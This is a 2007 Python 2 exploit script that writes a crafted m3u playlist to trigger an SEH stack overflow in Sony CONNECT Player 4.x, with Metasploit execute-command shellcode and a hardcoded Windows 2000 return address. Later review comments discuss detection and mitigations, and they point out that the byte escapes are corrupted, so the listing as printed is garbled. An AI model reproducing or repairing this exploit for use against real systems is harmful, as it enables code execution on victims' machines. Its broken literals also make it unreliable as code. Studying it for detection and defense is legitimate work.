
# Title : Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit
# Published : 2007-10-29
# Author : TaMBaRuS


#!/usr/bin/python
#Secunia Advisory : SA27270 
#Release Date : 2007-10-29
# Sony CONNECT Player M3U Playlist Processing Stack Buffer Overflow (m3u File) Local Exploit
# Bug discovered by  Parvez Anwar
# Exploit Written by TaMBaRuS (tambarus@gmail.com)
# Tested on:  Sony CONNECT Player (SonicStage) 4.x installed on Windows XP SP2/ 2k SP4
# Shellcode: Windows Execute Command <metasploit.com>
# Educational Purposes only  ;) 
##

from struct import pack

# Playlist skeleton: an Extended M3U header followed by a single URL entry
# whose host part is filled in below.
# NOTE(review): the escape sequences throughout this listing look corrupted
# by extraction ("n" where a newline escape would sit, "x56" where a byte
# escape would), so as written the literals hold plain ASCII letters rather
# than raw bytes.
m3u = ("#EXTM3Unhttp://%s")

# Payload appended after the overwritten handler. The header comment says it
# is a Metasploit "Windows Execute Command" payload; it is reproduced here
# unchanged only to show what the overflow carries. From a detection
# standpoint, a playlist "URL" consisting of a long run of repetitive or
# non-printable data is the distinguishing feature of such a file.
shellcode = (
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x50x4bx58x45x44x4ex33x4bx48x4ex57"
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58"
"x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx58"
"x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x35x46x42x46x30x45x57x45x4ex4bx38"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx54"
"x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex51x4bx48"
"x41x50x4bx4ex49x58x4ex55x46x52x46x50x43x4cx41x53"
"x42x4cx46x56x4bx38x42x34x42x33x45x38x42x4cx4ax47"
"x4ex50x4bx38x42x44x4ex50x4bx38x42x47x4ex41x4dx4a"
"x4bx48x4ax56x4ax30x4bx4ex49x30x4bx48x42x48x42x4b"
"x42x50x42x30x42x50x4bx38x4ax36x4ex43x4fx35x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x35x4ax56x42x4fx4cx48x46x50x4fx45x4ax56x4ax49"
"x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x46x41x36")

# Per the variable names, the overflow overwrites a structured-exception-handler
# record: the next-record pointer is replaced with a short forward jump and the
# handler pointer with the address of a POP/POP/RET sequence. The second value
# is taken from SHELL32.DLL on Windows 2000 SP4 (author's note), so it is tied
# to one exact OS build. SEH-overwrite mitigations (SafeSEH/SEHOP-style
# handler validation) and the vendor fix referenced by advisory SA27270 in
# the header are the relevant defenses.
NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA53D2       # POP POP RET (SHELL32.DLL/2k SP4)

# Trigger string, assembled in order: a short marker, 1062 repetitions of
# filler (presumably the distance from the start of the URL to the SEH
# record -- not verifiable from this listing), the two overwritten pointers
# packed little-endian, 90 repetitions of what is intended as a 0x90 NOP
# slide, then the payload. A single #EXTM3U entry well over 1 KiB long is
# the signature a content filter or parser fuzz harness would key on.
buf = "PLAY ME"
buf += "x3e" * 1062
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "x90" * 90
buf += shellcode

# Substitute the crafted string into the URL slot of the playlist template.
m3u %= buf

# Write the playlist to the current directory. Python 2 script (the file is
# opened in text mode and str is byte-oriented here; on Python 3 this would
# need bytes handling).
fd = open("playme.m3u", "w")
fd.write(m3u)
fd.close()

# Python 2 print statement; this file is not valid Python 3 syntax.
print "DONE"

# EoF
